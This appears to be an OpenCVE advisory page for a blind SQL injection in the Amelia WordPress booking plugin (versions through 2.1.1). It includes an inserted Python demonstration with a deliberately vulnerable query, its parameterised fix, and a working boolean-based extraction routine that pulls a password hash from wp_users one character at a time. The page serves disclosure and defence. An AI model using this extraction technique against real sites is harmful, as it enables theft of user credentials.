Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ameliabooking Amelia ameliabooking allows Blind SQL Injection. This issue affects Amelia: from n/a through <= 2.1.1.
Published: 2026-04-08
Score: 7.6 High
EPSS: < 1% Very Low
KEV: No
Impact: Database Compromise via SQL Injection
Action: Immediate Patch
AI Analysis

Impact

This issue arises from improper neutralization of special elements used within an SQL command (CWE-89) in the Amelia booking plugin. Attacker-controlled input reaches a query without adequate escaping or parameterization, so SQL fragments embedded in that input are executed by the database as part of the query. The injection is blind: the application does not return query results to the attacker, who instead infers them from differences in the response (a true/false branch in the page content, or a time delay) and reconstructs data one bit or one character at a time. The published CVSS vector rates confidentiality impact as high, integrity impact as none and availability impact as low, so the primary risk is disclosure of database contents rather than their modification.

Affected Systems

WordPress sites running the Amelia booking plugin at version 2.1.1 or earlier are vulnerable. The plugin is the vulnerable component, but a WordPress plugin runs in the same PHP process and uses the same database connection as core, so an injection in plugin code reaches every table in the site database, core tables such as wp_users included, not only the plugin's own tables.

Risk and Exploitability

The CVSS 3.1 base score of 7.6 (High) comes with the vector AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L: reachable over the network with low attack complexity and no user interaction, but only by an account that already holds high privileges; the changed scope reflects that the injected SQL runs against the site database shared with WordPress core. The EPSS score of less than 1% indicates a low estimated likelihood of exploitation in the wild, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The advisory does not name the affected endpoint; the likely path is a plugin form or API endpoint that passes a request parameter into a query unchecked, with the attacker inferring query results through blind techniques.

Generated by OpenCVE AI on April 10, 2026 at 19:39 UTC.
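The blind injection that the Impact and Risk and Exploitability paragraphs describe, as an added example that is not part of this page and is not the Amelia plugin's code: a hypothetical lookup that concatenates a request parameter into a query (vulnerable_lookup), the same lookup with the value validated and bound as a parameter (hardened_lookup), and a boolean-based extraction routine that uses nothing but the lookup's yes/no answer to recover a password hash from a shared wp_users table one character at a time. Table names, rows and the hash value are constructed for the example; SQLite stands in for MySQL, and the WordPress equivalent of the bound query is $wpdb->prepare().

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the single database that WordPress core and its
    plugins share. Tables, rows and the hash value are constructed for this example."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bexamplehash');
        CREATE TABLE amelia_customers (id INTEGER PRIMARY KEY, email TEXT);
        INSERT INTO amelia_customers VALUES (1, 'alice@example.com');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, customer_id: str) -> bool:
    """Vulnerable pattern (hypothetical, not Amelia's code): the request parameter
    is concatenated into the SQL text. The caller learns only whether a row
    matched, which is exactly the one-bit oracle a blind injection needs."""
    sql = "SELECT id FROM amelia_customers WHERE id = " + customer_id
    return conn.execute(sql).fetchone() is not None


def hardened_lookup(conn: sqlite3.Connection, customer_id: str) -> bool:
    """Fixed form: validate the type, then bind the value as a parameter so the
    database never parses it as SQL (in WordPress: $wpdb->prepare())."""
    try:
        cid = int(customer_id)
    except ValueError:
        return False
    row = conn.execute("SELECT id FROM amelia_customers WHERE id = ?", (cid,)).fetchone()
    return row is not None


def extract_via_oracle(lookup, conn: sqlite3.Connection, max_len: int = 64) -> str:
    """Boolean-based blind extraction of wp_users.user_pass for ID 1 through `lookup`.
    Every probe is a yes/no question; a binary search over code points costs about
    eight queries per character. Returns what was recovered ('' if the oracle is closed)."""
    target = "(SELECT user_pass FROM wp_users WHERE ID = 1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the secret has no character at this position.
        if not lookup(conn, f"1 AND length({target}) >= {pos}"):
            break
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if lookup(conn, f"1 AND unicode(substr({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", extract_via_oracle(vulnerable_lookup, db))   # leaks the hash
    print("hardened:  ", repr(extract_via_oracle(hardened_lookup, db)))  # recovers nothing
```

The extraction never sees a query result; it only needs the application to behave differently when the injected condition is true, which is why the advisory's "blind" qualifier does not reduce the confidentiality impact. Against the hardened lookup the very first probe fails type validation and the loop exits with nothing recovered.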

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the Amelia plugin to a release newer than 2.1.1 as soon as the vendor publishes one; the advisory scopes the issue to versions through 2.1.1 and, as of this page, no fixed version is listed.
  • If an immediate update is not possible, deactivate and remove the Amelia plugin until a fixed version is available. Because the CVSS vector requires high privileges (PR:H), also audit which accounts hold administrator-level roles on the site and remove or lock down any that are not needed, which shrinks the set of users able to reach the injection.

Generated by OpenCVE AI on April 10, 2026 at 19:39 UTC.
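A triage helper for the first recommended action, added here and not OpenCVE's or the vendor's code: it reads the Version: header that WordPress parses from a plugin's main PHP file and decides whether the installed build falls inside the advisory's affected range (through 2.1.1). The header text below is a constructed sample; point the parser at the real file on your site.

```python
import re

# Affected range taken from the advisory text: "from n/a through <= 2.1.1".
AFFECTED_THROUGH = (2, 1, 1)

# Constructed sample of the header comment WordPress reads from a plugin's main
# PHP file; the real Amelia file is not reproduced here.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Amelia
 * Version: 2.1.1
 */
"""


def parse_version(header_text: str) -> tuple:
    """Pull the 'Version:' header out of a plugin file and return it as a tuple
    of integers. Suffixes such as '-beta' are dropped; a missing header is an
    error rather than a guess."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", header_text, re.MULTILINE)
    if not m:
        raise ValueError("no Version: header found")
    nums = re.match(r"\d+(?:\.\d+)*", m.group(1))
    if not nums:
        raise ValueError(f"unparseable version {m.group(1)!r}")
    return tuple(int(p) for p in nums.group(0).split("."))


def is_affected(version: tuple) -> bool:
    """True if `version` falls in the advisory's affected range. Components are
    compared numerically and short versions are padded ('2.1' == '2.1.0'); a
    plain string comparison gets this wrong, since '10.0.0' sorts before '2.1.1'."""
    padded = tuple(version) + (0,) * max(0, len(AFFECTED_THROUGH) - len(version))
    return padded <= AFFECTED_THROUGH


if __name__ == "__main__":
    v = parse_version(SAMPLE_HEADER)
    print(".".join(map(str, v)), "affected" if is_affected(v) else "not affected")
```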

Advisories

No advisories yet.

History

Fri, 10 Apr 2026 18:15:00 +0000

  Metrics (values added)
    cvssV3_1: {'score': 7.6, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L'}
    ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 08 Apr 2026 19:45:00 +0000

  First Time appeared (values added): Ameliabooking; Ameliabooking amelia; Wordpress; Wordpress wordpress
  Vendors & Products (values added): Ameliabooking; Ameliabooking amelia; Wordpress; Wordpress wordpress

Wed, 08 Apr 2026 08:45:00 +0000

  Description (value added): Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ameliabooking Amelia ameliabooking allows Blind SQL Injection.This issue affects Amelia: from n/a through <= 2.1.1.
  Title (value added): WordPress Amelia plugin <= 2.1.1 - SQL Injection vulnerability
  Weaknesses (value added): CWE-89
  References (value added): (none recorded)

MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-29T09:52:01.937Z

Reserved: 2026-04-07T10:47:37.759Z

Link: CVE-2026-39487

Vulnrichment

Updated: 2026-04-10T18:09:35.678Z

NVD

Status: Deferred

Published: 2026-04-08T09:16:23.533

Modified: 2026-04-24T18:08:35.440

Link: CVE-2026-39487

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-13T14:25:35Z

Weaknesses